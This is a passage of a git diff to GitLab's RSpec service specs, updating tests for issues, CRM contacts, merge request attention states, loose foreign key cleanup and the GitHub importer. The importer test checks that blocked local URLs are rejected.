Groups::UpdateSharedRunnersService do let(:params) { { shared_runners_setting: 'invalid_enabled' } } it 'does not update pending builds for the group' do + expect(::Ci::UpdatePendingBuildService).not_to receive(:new).and_call_original + subject expect(pending_build_1.reload.instance_runners_enabled).to be_falsey @@ -99,6 +103,8 @@ RSpec.describe Groups::UpdateSharedRunnersService do let_it_be(:pending_build_2) { create(:ci_pending_build, project: project, instance_runners_enabled: true) } it 'updates pending builds for the group' do + expect(::Ci::UpdatePendingBuildService).to receive(:new).and_call_original + subject expect(pending_build_1.reload.instance_runners_enabled).to be_falsey diff --git a/spec/services/import/github_service_spec.rb b/spec/services/import/github_service_spec.rb index 776df01d399..04a94d96f67 100644 --- a/spec/services/import/github_service_spec.rb +++ b/spec/services/import/github_service_spec.rb @@ -8,7 +8,7 @@ RSpec.describe Import::GithubService do let_it_be(:access_params) { { github_access_token: 'github-complex-token' } } let_it_be(:params) { { repo_id: 123, new_name: 'new_repo', target_namespace: 'root' } } - let(:subject) { described_class.new(client, user, params) } + subject(:github_importer) { described_class.new(client, user, params) } before do allow(subject).to receive(:authorized?).and_return(true) @@ -110,6 +110,29 @@ RSpec.describe Import::GithubService do end end end + + context 'when a blocked/local URL is used as github_hostname' do + let(:message) { 'Error while attempting to import from GitHub' } + let(:error) { "Invalid URL: #{url}" } + + before do + stub_application_setting(allow_local_requests_from_web_hooks_and_services: false) + end + + where(url: %w[https://localhost https://10.0.0.1]) + + with_them do + it 'returns and logs an error' do + allow(github_importer).to receive(:url).and_return(url) + + expect(Gitlab::Import::Logger).to receive(:error).with({ + message: message, + error: error + }).and_call_original + expect(github_importer.execute(access_params, :github)).to include(blocked_url_error(url)) + end + end + end end context 'when remove_legacy_github_client feature flag is enabled' do @@ -135,4 +158,12 @@ RSpec.describe Import::GithubService do message: '"repository" size (101 Bytes) is larger than the limit of 100 Bytes.' } end + + def blocked_url_error(url) + { + status: :error, + http_status: :bad_request, + message: "Invalid URL: #{url}" + } + end end diff --git a/spec/services/incident_management/issuable_escalation_statuses/create_service_spec.rb b/spec/services/incident_management/issuable_escalation_statuses/create_service_spec.rb new file mode 100644 index 00000000000..8fbab361ec4 --- /dev/null +++ b/spec/services/incident_management/issuable_escalation_statuses/create_service_spec.rb @@ -0,0 +1,30 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe IncidentManagement::IssuableEscalationStatuses::CreateService do + let_it_be(:project) { create(:project) } + + let(:incident) { create(:incident, project: project) } + let(:service) { described_class.new(incident) } + + subject(:execute) { service.execute} + + it 'creates an escalation status for the incident with no policy set' do + expect { execute }.to change { incident.reload.incident_management_issuable_escalation_status }.from(nil) + + status = incident.incident_management_issuable_escalation_status + + expect(status.policy_id).to eq(nil) + expect(status.escalations_started_at).to eq(nil) + expect(status.status_name).to eq(:triggered) + end + + context 'existing escalation status' do + let!(:existing_status) { create(:incident_management_issuable_escalation_status, issue: incident) } + + it 'exits without changing anything' do + expect { execute }.not_to change { incident.reload.incident_management_issuable_escalation_status } + end + end +end diff --git a/spec/services/admin/propagate_integration_service_spec.rb b/spec/services/integrations/propagate_service_spec.rb index b379286ba4f..7ae843f6aeb 100644 --- a/spec/services/admin/propagate_integration_service_spec.rb +++ b/spec/services/integrations/propagate_service_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe Admin::PropagateIntegrationService do +RSpec.describe Integrations::PropagateService do describe '.propagate' do include JiraServiceHelper diff --git a/spec/services/issues/create_service_spec.rb b/spec/services/issues/create_service_spec.rb index 18e03db11dc..8496bd31e00 100644 --- a/spec/services/issues/create_service_spec.rb +++ b/spec/services/issues/create_service_spec.rb @@ -5,7 +5,8 @@ require 'spec_helper' RSpec.describe Issues::CreateService do include AfterNextHelpers - let_it_be_with_reload(:project) { create(:project) } + let_it_be(:group) { create(:group) } + let_it_be_with_reload(:project) { create(:project, group: group) } let_it_be(:user) { create(:user) } let(:spam_params) { double } @@ -107,6 +108,13 @@ RSpec.describe Issues::CreateService do .to change { Label.where(incident_label_attributes).count }.by(1) end + it 'calls IncidentManagement::Incidents::CreateEscalationStatusService' do + expect_next(::IncidentManagement::IssuableEscalationStatuses::CreateService, a_kind_of(Issue)) + .to receive(:execute) + + issue + end + context 'when invalid' do before do opts.merge!(title: '') @@ -154,7 +162,7 @@ RSpec.describe Issues::CreateService do end it 'moves the issue to the end, in an asynchronous worker' do - expect(IssuePlacementWorker).to receive(:perform_async).with(be_nil, Integer) + expect(Issues::PlacementWorker).to receive(:perform_async).with(be_nil, Integer) described_class.new(project: project, current_user: user, params: opts, spam_params: spam_params).execute end @@ -430,25 +438,29 @@ RSpec.describe Issues::CreateService do end context 'Quick actions' do - context 'with assignee and milestone in params and command' do + context 'with assignee, milestone, and contact in params and command' do + let_it_be(:contact) { create(:contact, group: group) } + let(:opts) do { assignee_ids: [create(:user).id], milestone_id: 1, title: 'Title', - description: %(/assign @#{assignee.username}\n/milestone %"#{milestone.name}") + description: %(/assign @#{assignee.username}\n/milestone %"#{milestone.name}"), + add_contacts: [contact.email] } end before_all do - project.add_maintainer(user) + group.add_maintainer(user) project.add_maintainer(assignee) end - it 'assigns and sets milestone to issuable from command' do + it 'assigns, sets milestone, and sets contact to issuable from command' do expect(issue).to be_persisted expect(issue.assignees).to eq([assignee]) expect(issue.milestone).to eq(milestone) + expect(issue.issue_customer_relations_contacts.last.contact).to eq(contact) end end end diff --git a/spec/services/issues/set_crm_contacts_service_spec.rb b/spec/services/issues/set_crm_contacts_service_spec.rb index 65b22fe3b35..628f70efad6 100644 --- a/spec/services/issues/set_crm_contacts_service_spec.rb +++ b/spec/services/issues/set_crm_contacts_service_spec.rb @@ -22,13 +22,13 @@ RSpec.describe Issues::SetCrmContactsService do describe '#execute' do context 'when the user has no permission' do - let(:params) { { crm_contact_ids: [contacts[1].id, contacts[2].id] } } + let(:params) { { replace_ids: [contacts[1].id, contacts[2].id] } } it 'returns expected error response' do response = set_crm_contacts expect(response).to be_error - expect(response.message).to match_array(['You have insufficient permissions to set customer relations contacts for this issue']) + expect(response.message).to eq('You have insufficient permissions to set customer relations contacts for this issue') end end @@ -38,20 +38,20 @@ RSpec.describe Issues::SetCrmContactsService do end context 'when the contact does not exist' do - let(:params) { { crm_contact_ids: [non_existing_record_id] } } + let(:params) { { replace_ids: [non_existing_record_id] } } it 'returns expected error response' do response = set_crm_contacts expect(response).to be_error - expect(response.message).to match_array(["Issue customer relations contacts #{non_existing_record_id}: #{does_not_exist_or_no_permission}"]) + expect(response.message).to eq("Issue customer relations contacts #{non_existing_record_id}: #{does_not_exist_or_no_permission}") end end context 'when the contact belongs to a different group' do let(:group2) { create(:group) } let(:contact) { create(:contact, group: group2) } - let(:params) { { crm_contact_ids: [contact.id] } } + let(:params) { { replace_ids: [contact.id] } } before do group2.add_reporter(user) @@ -61,12 +61,12 @@ RSpec.describe Issues::SetCrmContactsService do response = set_crm_contacts expect(response).to be_error - expect(response.message).to match_array(["Issue customer relations contacts #{contact.id}: #{does_not_exist_or_no_permission}"]) + expect(response.message).to eq("Issue customer relations contacts #{contact.id}: #{does_not_exist_or_no_permission}") end end context 'replace' do - let(:params) { { crm_contact_ids: [contacts[1].id, contacts[2].id] } } + let(:params) { { replace_ids: [contacts[1].id, contacts[2].id] } } it 'updates the issue with correct contacts' do response = set_crm_contacts @@ -77,7 +77,18 @@ RSpec.describe Issues::SetCrmContactsService do end context 'add' do - let(:params) { { add_crm_contact_ids: [contacts[3].id] } } + let(:params) { { add_ids: [contacts[3].id] } } + + it 'updates the issue with correct contacts' do + response = set_crm_contacts + + expect(response).to be_success + expect(issue.customer_relations_contacts).to match_array([contacts[0], contacts[1], contacts[3]]) + end + end + + context 'add by email' do + let(:params) { { add_emails: [contacts[3].email] } } it 'updates the issue with correct contacts' do response = set_crm_contacts @@ -88,7 +99,18 @@ RSpec.describe Issues::SetCrmContactsService do end context 'remove' do - let(:params) { { remove_crm_contact_ids: [contacts[0].id] } } + let(:params) { { remove_ids: [contacts[0].id] } } + + it 'updates the issue with correct contacts' do + response = set_crm_contacts + + expect(response).to be_success + expect(issue.customer_relations_contacts).to match_array([contacts[1]]) + end + end + + context 'remove by email' do + let(:params) { { remove_emails: [contacts[0].email] } } it 'updates the issue with correct contacts' do response = set_crm_contacts @@ -100,18 +122,18 @@ RSpec.describe Issues::SetCrmContactsService do context 'when attempting to add more than 6' do let(:id) { contacts[0].id } - let(:params) { { add_crm_contact_ids: [id, id, id, id, id, id, id] } } + let(:params) { { add_ids: [id, id, id, id, id, id, id] } } it 'returns expected error message' do response = set_crm_contacts expect(response).to be_error - expect(response.message).to match_array(['You can only add up to 6 contacts at one time']) + expect(response.message).to eq('You can only add up to 6 contacts at one time') end end context 'when trying to remove non-existent contact' do - let(:params) { { remove_crm_contact_ids: [non_existing_record_id] } } + let(:params) { { remove_ids: [non_existing_record_id] } } it 'returns expected error message' do response = set_crm_contacts @@ -122,10 +144,10 @@ RSpec.describe Issues::SetCrmContactsService do end context 'when combining params' do - let(:error_invalid_params) { 'You cannot combine crm_contact_ids with add_crm_contact_ids or remove_crm_contact_ids' } + let(:error_invalid_params) { 'You cannot combine replace_ids with add_ids or remove_ids' } context 'add and remove' do - let(:params) { { remove_crm_contact_ids: [contacts[1].id], add_crm_contact_ids: [contacts[3].id] } } + let(:params) { { remove_ids: [contacts[1].id], add_ids: [contacts[3].id] } } it 'updates the issue with correct contacts' do response = set_crm_contacts @@ -136,27 +158,57 @@ RSpec.describe Issues::SetCrmContactsService do end context 'replace and remove' do - let(:params) { { crm_contact_ids: [contacts[3].id], remove_crm_contact_ids: [contacts[0].id] } } + let(:params) { { replace_ids: [contacts[3].id], remove_ids: [contacts[0].id] } } it 'returns expected error response' do response = set_crm_contacts expect(response).to be_error - expect(response.message).to match_array([error_invalid_params]) + expect(response.message).to eq(error_invalid_params) end end context 'replace and add' do - let(:params) { { crm_contact_ids: [contacts[3].id], add_crm_contact_ids: [contacts[1].id] } } + let(:params) { { replace_ids: [contacts[3].id], add_ids: [contacts[1].id] } } it 'returns expected error response' do response = set_crm_contacts expect(response).to be_error - expect(response.message).to match_array([error_invalid_params]) + expect(response.message).to eq(error_invalid_params) end end end + + context 'when trying to add an existing issue contact' do + let(:params) { { add_ids: [contacts[0].id] } } + + it 'does not return an error' do + response = set_crm_contacts + + expect(response).to be_success + end + end + + context 'when trying to add the same contact twice' do + let(:params) { { add_ids: [contacts[3].id, contacts[3].id] } } + + it 'does not return an error' do + response = set_crm_contacts + + expect(response).to be_success + end + end + + context 'when trying to remove a contact not attached to the issue' do + let(:params) { { remove_ids: [contacts[3].id] } } + + it 'does not return an error' do + response = set_crm_contacts + + expect(response).to be_success + end + end end end end diff --git a/spec/services/issues/update_service_spec.rb b/spec/services/issues/update_service_spec.rb index 85b8fef685e..4739b7e0f28 100644 --- a/spec/services/issues/update_service_spec.rb +++ b/spec/services/issues/update_service_spec.rb @@ -29,6 +29,8 @@ RSpec.describe Issues::UpdateService, :mailer do end describe 'execute' do + let_it_be(:contact) { create(:contact, group: group) } + def find_note(starting_with) issue.notes.find do |note| note && note.note.start_with?(starting_with) @@ -57,7 +59,8 @@ RSpec.describe Issues::UpdateService, :mailer do due_date: Date.tomorrow, discussion_locked: true, severity: 'low', - milestone_id: milestone.id + milestone_id: milestone.id, + add_contacts: [contact.email] } end @@ -76,6 +79,7 @@ RSpec.describe Issues::UpdateService, :mailer do expect(issue.discussion_locked).to be_truthy expect(issue.confidential).to be_falsey expect(issue.milestone).to eq milestone + expect(issue.issue_customer_relations_contacts.last.contact).to eq contact end it 'updates issue milestone when passing `milestone` param' do @@ -319,7 +323,7 @@ RSpec.describe Issues::UpdateService, :mailer do opts[:move_between_ids] = [issue1.id, issue2.id] - expect(IssueRebalancingWorker).not_to receive(:perform_async) + expect(Issues::RebalancingWorker).not_to receive(:perform_async) update_issue(opts) expect(issue.relative_position).to be_between(issue1.relative_position, issue2.relative_position) @@ -335,7 +339,7 @@ RSpec.describe Issues::UpdateService, :mailer do opts[:move_between_ids] = [issue1.id, issue2.id] - expect(IssueRebalancingWorker).to receive(:perform_async).with(nil, nil, project.root_namespace.id) + expect(Issues::RebalancingWorker).to receive(:perform_async).with(nil, nil, project.root_namespace.id) update_issue(opts) expect(issue.relative_position).to be_between(issue1.relative_position, issue2.relative_position) @@ -349,7 +353,7 @@ RSpec.describe Issues::UpdateService, :mailer do opts[:move_between_ids] = [issue1.id, issue2.id] - expect(IssueRebalancingWorker).to receive(:perform_async).with(nil, nil, project.root_namespace.id) + expect(Issues::RebalancingWorker).to receive(:perform_async).with(nil, nil, project.root_namespace.id) update_issue(opts) expect(issue.relative_position).to be_between(issue1.relative_position, issue2.relative_position) @@ -363,7 +367,7 @@ RSpec.describe Issues::UpdateService, :mailer do opts[:move_between_ids] = [issue1.id, issue2.id] - expect(IssueRebalancingWorker).to receive(:perform_async).with(nil, nil, project.root_namespace.id) + expect(Issues::RebalancingWorker).to receive(:perform_async).with(nil, nil, project.root_namespace.id) update_issue(opts) expect(issue.relative_position).to be_between(issue1.relative_position, issue2.relative_position) diff --git a/spec/services/loose_foreign_keys/batch_cleaner_service_spec.rb b/spec/services/loose_foreign_keys/batch_cleaner_service_spec.rb index bdb3d0f6700..d3d57ea2444 100644 --- a/spec/services/loose_foreign_keys/batch_cleaner_service_spec.rb +++ b/spec/services/loose_foreign_keys/batch_cleaner_service_spec.rb @@ -21,33 +21,34 @@ RSpec.describe LooseForeignKeys::BatchCleanerService do migration.track_record_deletions(:_test_loose_fk_parent_table) end - let(:parent_model) do - Class.new(ApplicationRecord) do - self.table_name = '_test_loose_fk_parent_table' - - include LooseForeignKey - - loose_foreign_key :_test_loose_fk_child_table_1, :parent_id, on_delete: :async_delete - loose_foreign_key :_test_loose_fk_child_table_2, :parent_id_with_different_column, on_delete: :async_nullify - end - end - - let(:child_model_1) do - Class.new(ApplicationRecord) do - self.table_name = '_test_loose_fk_child_table_1' - end - end - - let(:child_model_2) do - Class.new(ApplicationRecord) do - self.table_name = '_test_loose_fk_child_table_2' - end + let(:loose_foreign_key_definitions) do + [ + ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new( + '_test_loose_fk_child_table_1', + '_test_loose_fk_parent_table', + { + column: 'parent_id', + on_delete: :async_delete, + gitlab_schema: :gitlab_main + } + ), + ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new( + '_test_loose_fk_child_table_2', + '_test_loose_fk_parent_table', + { + column: 'parent_id_with_different_column', + on_delete: :async_nullify, + gitlab_schema: :gitlab_main + } + ) + ] end + let(:loose_fk_parent_table) { table(:_test_loose_fk_parent_table) } let(:loose_fk_child_table_1) { table(:_test_loose_fk_child_table_1) } let(:loose_fk_child_table_2) { table(:_test_loose_fk_child_table_2) } - let(:parent_record_1) { parent_model.create! } - let(:other_parent_record) { parent_model.create! } + let(:parent_record_1) { loose_fk_parent_table.create! } + let(:other_parent_record) { loose_fk_parent_table.create! } before(:all) do create_table_structure @@ -87,12 +88,10 @@ RSpec.describe LooseForeignKeys::BatchCleanerService do expect(loose_fk_child_table_1.count).to eq(4) expect(loose_fk_child_table_2.count).to eq(4) - described_class.new(parent_klass: parent_model, - deleted_parent_records: LooseForeignKeys::DeletedRecord.status_pending.all, - models_by_table_name: { - '_test_loose_fk_child_table_1' => child_model_1, - '_test_loose_fk_child_table_2' => child_model_2 - }).execute + described_class.new(parent_table: '_test_loose_fk_parent_table', + loose_foreign_key_definitions: loose_foreign_key_definitions, + deleted_parent_records: LooseForeignKeys::DeletedRecord.load_batch_for_table('public._test_loose_fk_parent_table', 100) + ).execute end it 'cleans up the child records' do @@ -108,7 +107,7 @@ RSpec.describe LooseForeignKeys::BatchCleanerService do it 'records the DeletedRecord status updates', :prometheus do counter = Gitlab::Metrics.registry.get(:loose_foreign_key_processed_deleted_records) - expect(counter.get(table: parent_model.table_name, db_config_name: 'main')).to eq(1) + expect(counter.get(table: loose_fk_parent_table.table_name, db_config_name: 'main')).to eq(1) end it 'does not delete unrelated records' do diff --git a/spec/services/loose_foreign_keys/cleaner_service_spec.rb b/spec/services/loose_foreign_keys/cleaner_service_spec.rb index 6f37ac49435..2cfd8385953 100644 --- a/spec/services/loose_foreign_keys/cleaner_service_spec.rb +++ b/spec/services/loose_foreign_keys/cleaner_service_spec.rb @@ -13,21 +13,21 @@ RSpec.describe LooseForeignKeys::CleanerService do let(:loose_fk_definition) do ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new( - 'projects', 'issues', + 'projects', { column: 'project_id', - on_delete: :async_nullify + on_delete: :async_nullify, + gitlab_schema: :gitlab_main } ) end subject(:cleaner_service) do described_class.new( - model: Issue, - foreign_key_definition: loose_fk_definition, - deleted_parent_records: deleted_records - ) + loose_foreign_key_definition: loose_fk_definition, + connection: ApplicationRecord.connection, + deleted_parent_records: deleted_records) end context 'when invalid foreign key definition is passed' do @@ -80,11 +80,12 @@ RSpec.describe LooseForeignKeys::CleanerService do let(:loose_fk_definition) do ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new( - 'users', 'project_authorizations', + 'users', { column: 'user_id', - on_delete: :async_delete + on_delete: :async_delete, + gitlab_schema: :gitlab_main } ) end @@ -97,8 +98,8 @@ RSpec.describe LooseForeignKeys::CleanerService do subject(:cleaner_service) do described_class.new( - model: ProjectAuthorization, - foreign_key_definition: loose_fk_definition, + loose_foreign_key_definition: loose_fk_definition, + connection: ApplicationRecord.connection, deleted_parent_records: deleted_records ) end @@ -130,8 +131,8 @@ RSpec.describe LooseForeignKeys::CleanerService do context 'when with_skip_locked parameter is true' do subject(:cleaner_service) do described_class.new( - model: Issue, - foreign_key_definition: loose_fk_definition, + loose_foreign_key_definition: loose_fk_definition, + connection: ApplicationRecord.connection, deleted_parent_records: deleted_records, with_skip_locked: true ) diff --git a/spec/services/members/create_service_spec.rb b/spec/services/members/create_service_spec.rb index fe866d73215..13f56fe7458 100644 --- a/spec/services/members/create_service_spec.rb +++ b/spec/services/members/create_service_spec.rb @@ -127,85 +127,11 @@ RSpec.describe Members::CreateService, :aggregate_failures, :clean_gitlab_redis_ end end - context 'when tracking the areas of focus', :snowplow do - context 'when areas_of_focus is not passed' do - it 'does not track' do - execute_service - - expect_no_snowplow_event(category: described_class.name, action: 'area_of_focus') - end - end - - context 'when 1 areas_of_focus is passed' do - let(:additional_params) { { invite_source: '_invite_source_', areas_of_focus: ['no_selection'] } } - - it 'tracks the areas_of_focus from params' do - execute_service - - expect_snowplow_event( - category: described_class.name, - action: 'area_of_focus', - label: 'no_selection', - property: source.members.last.id.to_s - ) - end - - context 'when passing many user ids' do - let(:another_user) { create(:user) } - let(:user_ids) { [member.id, another_user.id].join(',') } - - it 'tracks the areas_of_focus from params' do - execute_service - - members = source.members.last(2) - - expect_snowplow_event( - category: described_class.name, - action: 'area_of_focus', - label: 'no_selection', - property: members.first.id.to_s - ) - expect_snowplow_event( - category: described_class.name, - action: 'area_of_focus', - label: 'no_selection', - property: members.last.id.to_s - ) - end - end - end - - context 'when multiple areas_of_focus are passed' do - let(:additional_params) { { invite_source: '_invite_source_', areas_of_focus: %w[no_selection Other] } } - - it 'tracks the areas_of_focus from params' do - execute_service - - expect_snowplow_event( - category: described_class.name, - action: 'area_of_focus', - label: 'no_selection', - property: source.members.last.id.to_s - ) - expect_snowplow_event( - category: described_class.name, - action: 'area_of_focus', - label: 'Other', - property: source.members.last.id.to_s - ) - end - end - end - context 'when assigning tasks to be done' do let(:additional_params) do { invite_source: '_invite_source_', tasks_to_be_done: %w(ci code), tasks_project_id: source.id } end - before do - stub_experiments(invite_members_for_task: true) - end - it 'creates 2 task issues', :aggregate_failures do expect(TasksToBeDone::CreateWorker) .to receive(:perform_async) diff --git a/spec/services/merge_requests/after_create_service_spec.rb b/spec/services/merge_requests/after_create_service_spec.rb index cbbd193a411..781be57d709 100644 --- a/spec/services/merge_requests/after_create_service_spec.rb +++ b/spec/services/merge_requests/after_create_service_spec.rb @@ -85,13 +85,67 @@ RSpec.describe MergeRequests::AfterCreateService do context 'when merge request is in preparing state' do before do + merge_request.mark_as_unchecked! unless merge_request.unchecked? merge_request.mark_as_preparing! - execute_service end it 'marks the merge request as unchecked' do + execute_service + expect(merge_request.reload).to be_unchecked end + + context 'when preparing for mergeability fails' do + before do + # This is only one of the possible cases that can fail. This is to + # simulate a failure that happens during the service call. + allow(merge_request) + .to receive(:update_head_pipeline) + .and_raise(StandardError) + end + + it 'does not mark the merge request as unchecked' do + expect { execute_service }.to raise_error(StandardError) + expect(merge_request.reload).to be_preparing + end + + context 'when early_prepare_for_mergeability feature flag is disabled' do + before do + stub_feature_flags(early_prepare_for_mergeability: false) + end + + it 'does not mark the merge request as unchecked' do + expect { execute_service }.to raise_error(StandardError) + expect(merge_request.reload).to be_preparing + end + end + end + + context 'when preparing merge request fails' do + before do + # This is only one of the possible cases that can fail. This is to + # simulate a failure that happens during the service call. + allow(merge_request) + .to receive_message_chain(:diffs, :write_cache) + .and_raise(StandardError) + end + + it 'still marks the merge request as unchecked' do + expect { execute_service }.to raise_error(StandardError) + expect(merge_request.reload).to be_unchecked + end + + context 'when early_prepare_for_mergeability feature flag is disabled' do + before do + stub_feature_flags(early_prepare_for_mergeability: false) + end + + it 'does not mark the merge request as unchecked' do + expect { execute_service }.to raise_error(StandardError) + expect(merge_request.reload).to be_preparing + end + end + end end it 'increments the usage data counter of create event' do diff --git a/spec/services/merge_requests/approval_service_spec.rb b/spec/services/merge_requests/approval_service_spec.rb index d30b2721a36..4d20d62b864 100644 --- a/spec/services/merge_requests/approval_service_spec.rb +++ b/spec/services/merge_requests/approval_service_spec.rb @@ -5,7 +5,7 @@ require 'spec_helper' RSpec.describe MergeRequests::ApprovalService do describe '#execute' do let(:user) { create(:user) } - let(:merge_request) { create(:merge_request) } + let(:merge_request) { create(:merge_request, reviewers: [user]) } let(:project) { merge_request.project } let!(:todo) { create(:todo, user: user, project: project, target: merge_request) } @@ -59,6 +59,14 @@ RSpec.describe MergeRequests::ApprovalService do service.execute(merge_request) end + it 'removes attention requested state' do + expect(MergeRequests::RemoveAttentionRequestedService).to receive(:new) + .with(project: project, current_user: user, merge_request: merge_request, user: user) + .and_call_original + + service.execute(merge_request) + end + context 'with remaining approvals' do it 'fires an approval webhook' do expect(service).to receive(:execute_hooks).with(merge_request, 'approved') diff --git a/spec/services/merge_requests/bulk_remove_attention_requested_service_spec.rb b/spec/services/merge_requests/bulk_remove_attention_requested_service_spec.rb new file mode 100644 index 00000000000..fe4ce0dab5e --- /dev/null +++ b/spec/services/merge_requests/bulk_remove_attention_requested_service_spec.rb @@ -0,0 +1,45 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe MergeRequests::BulkRemoveAttentionRequestedService do + let(:current_user) { create(:user) } + let(:user) { create(:user) } + let(:assignee_user) { create(:user) } + let(:merge_request) { create(:merge_request, reviewers: [user], assignees: [assignee_user]) } + let(:reviewer) { merge_request.find_reviewer(user) } + let(:assignee) { merge_request.find_assignee(assignee_user) } + let(:project) { merge_request.project } + let(:service) { described_class.new(project: project, current_user: current_user, merge_request: merge_request) } + let(:result) { service.execute } + + before do + project.add_developer(current_user) + project.add_developer(user) + end + + describe '#execute' do + context 'invalid permissions' do + let(:service) { described_class.new(project: project, current_user: create(:user), merge_request: merge_request) } + + it 'returns an error' do + expect(result[:status]).to eq :error + end + end + + context 'updates reviewers and assignees' do + it 'returns success' do + expect(result[:status]).to eq :success + end + + it 'updates reviewers state' do + service.execute + reviewer.reload + assignee.reload + + expect(reviewer.state).to eq 'reviewed' + expect(assignee.state).to eq 'reviewed' + end + end + end +end diff --git a/spec/services/merge_requests/close_service_spec.rb b/spec/services/merge_requests/close_service_spec.rb index 86d972bc516..d36a2f75cfe 100644 --- a/spec/services/merge_requests/close_service_spec.rb +++ b/spec/services/merge_requests/close_service_spec.rb @@ -54,6 +54,10 @@ RSpec.describe MergeRequests::CloseService do expect(todo.reload).to be_done end + it 'removes attention requested state' do + expect(merge_request.find_assignee(user2).attention_requested?).to eq(false) + end + context 'when auto merge is enabled' do let(:merge_request) { create(:merge_request, :merge_when_pipeline_succeeds) } diff --git a/spec/services/merge_requests/handle_assignees_change_service_spec.rb b/spec/services/merge_requests/handle_assignees_change_service_spec.rb index c43f5db6059..fa3b1614e21 100644 --- a/spec/services/merge_requests/handle_assignees_change_service_spec.rb +++ b/spec/services/merge_requests/handle_assignees_change_service_spec.rb @@ -87,6 +87,14 @@ RSpec.describe MergeRequests::HandleAssigneesChangeService do expect(todo).to be_pending end + it 'removes attention requested state' do + expect(MergeRequests::RemoveAttentionRequestedService).to receive(:new) + .with(project: project, current_user: user, merge_request: merge_request, user: user) + .and_call_original + + execute + end + it 'tracks users assigned event' do expect(Gitlab::UsageDataCounters::MergeRequestActivityUniqueCounter) .to receive(:track_users_assigned_to_mr).once.with(users: [assignee]) diff --git a/spec/services/merge_requests/merge_service_spec.rb b/spec/services/merge_requests/merge_service_spec.rb index e3f33304aab..127c94763d9 100644 --- a/spec/services/merge_requests/merge_service_spec.rb +++ b/spec/services/merge_requests/merge_service_spec.rb @@ -151,7 +151,7 @@ RSpec.describe MergeRequests::MergeService do it 'closes GitLab issue tracker issues' do issue = create :issue, project: project - commit = instance_double('commit', safe_message: "Fixes #{issue.to_reference}", date: Time.current, authored_date: Time.current) + commit = double('commit', safe_message: "Fixes #{issue.to_reference}", date: Time.current, authored_date: Time.current) allow(merge_request).to receive(:commits).and_return([commit]) merge_request.cache_merge_request_closes_issues! diff --git a/spec/services/merge_requests/merge_to_ref_service_spec.rb b/spec/services/merge_requests/merge_to_ref_service_spec.rb index 0a781aee704..19fac3b5095 100644 --- a/spec/services/merge_requests/merge_to_ref_service_spec.rb +++ b/spec/services/merge_requests/merge_to_ref_service_spec.rb @@ -150,7 +150,10 @@ RSpec.describe MergeRequests::MergeToRefService do merge_request.update!(squash: true) end - it_behaves_like 'MergeService for target ref' + it_behaves_like 'successfully merges to ref with merge method' do + let(:first_parent_ref) { 'refs/heads/master' } + let(:target_ref) { merge_request.merge_ref_path } + end it 'does not squash before merging' do expect(MergeRequests::SquashService).not_to receive(:new) diff --git a/spec/services/merge_requests/rebase_service_spec.rb b/spec/services/merge_requests/rebase_service_spec.rb index ca561376581..e671bbf2cd6 100644 --- a/spec/services/merge_requests/rebase_service_spec.rb +++ b/spec/services/merge_requests/rebase_service_spec.rb @@ -80,6 +80,27 @@ RSpec.describe MergeRequests::RebaseService do end end + context 'with a pre-receive failure' do + let(:pre_receive_error) { "Commit message does not follow the pattern 'ACME'" } + let(:merge_error) { "Something went wrong during the rebase pre-receive hook: #{pre_receive_error}." } + + before do + allow(repository).to receive(:gitaly_operation_client).and_raise(Gitlab::Git::PreReceiveError, "GitLab: #{pre_receive_error}") + end + + it 'saves a specific message' do + subject.execute(merge_request) + + expect(merge_request.reload.merge_error).to eq merge_error + end + + it 'returns an error' do + expect(service.execute(merge_request)).to match( + status: :error, + message: merge_error) + end + end + context 'with git command failure' do before do allow(repository).to receive(:gitaly_operation_client).and_raise(Gitlab::Git::Repository::GitError, 'Something went wrong') diff --git a/spec/services/merge_requests/remove_attention_requested_service_spec.rb b/spec/services/merge_requests/remove_attention_requested_service_spec.rb new file mode 100644 index 00000000000..875afc2dc7e --- /dev/null +++ b/spec/services/merge_requests/remove_attention_requested_service_spec.rb @@ -0,0 +1,85 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe MergeRequests::RemoveAttentionRequestedService do + let(:current_user) { create(:user) } + let(:user) { create(:user) } + let(:assignee_user) { create(:user) } + let(:merge_request) { create(:merge_request, reviewers: [user], assignees: [assignee_user]) } + let(:reviewer) { merge_request.find_reviewer(user) } + let(:assignee) { merge_request.find_assignee(assignee_user) } + let(:project) { merge_request.project } + let(:service) { described_class.new(project: project, current_user: current_user, merge_request: merge_request, user: user) } + let(:result) { service.execute } + + before do + project.add_developer(current_user) + project.add_developer(user) + end + + describe '#execute' do + context 'invalid permissions' do + let(:service) { described_class.new(project: project, current_user: create(:user), merge_request: merge_request, user: user) } + + it 'returns an error' do + expect(result[:status]).to eq :error + end + end + + context 'reviewer does not exist' do + let(:service) { described_class.new(project: project, current_user: current_user, merge_request: merge_request, user: create(:user)) } + + it 'returns an error' do + expect(result[:status]).to eq :error + end + end + + context 'reviewer exists' do + it 'returns success' do + expect(result[:status]).to eq :success + end + + it 'updates reviewers state' do + service.execute + reviewer.reload + + expect(reviewer.state).to eq 'reviewed' + end + end + + context 'assignee exists' do + let(:service) { described_class.new(project: project, current_user: current_user, merge_request: merge_request, user: assignee_user) } + + before do + assignee.update!(state: :reviewed) + end + + it 'returns success' do + expect(result[:status]).to eq :success + end + + it 'updates assignees state' do + service.execute + assignee.reload + + expect(assignee.state).to eq 'reviewed' + end + end + + context 'assignee is the same as reviewer' do + let(:merge_request) { create(:merge_request, reviewers: [user], assignees: [user]) } + let(:service) { described_class.new(project: project, current_user: current_user, merge_request: merge_request, user: user) } + let(:assignee) { merge_request.find_assignee(user) } + + it 'updates reviewers and assignees state' do + service.execute + reviewer.reload + assignee.reload + + expect(reviewer.state).to eq 'reviewed' + expect(assignee.state).to eq 'reviewed' + end + end + end +end diff --git a/spec/services/merge_requests/resolved_discussion_notification_service_spec.rb b/spec/services/merge_requests/resolved_discussion_notification_service_spec.rb index 74f3a1b06fc..2f191f2ee44 100644 --- a/spec/services/merge_requests/resolved_discussion_notification_service_spec.rb +++ b/spec/services/merge_requests/resolved_discussion_notification_service_spec.rb @@ -26,6 +26,12 @@ RSpec.describe MergeRequests::ResolvedDiscussionNotificationService do subject.execute(merge_request) end + + it "doesn't send a webhook" do + 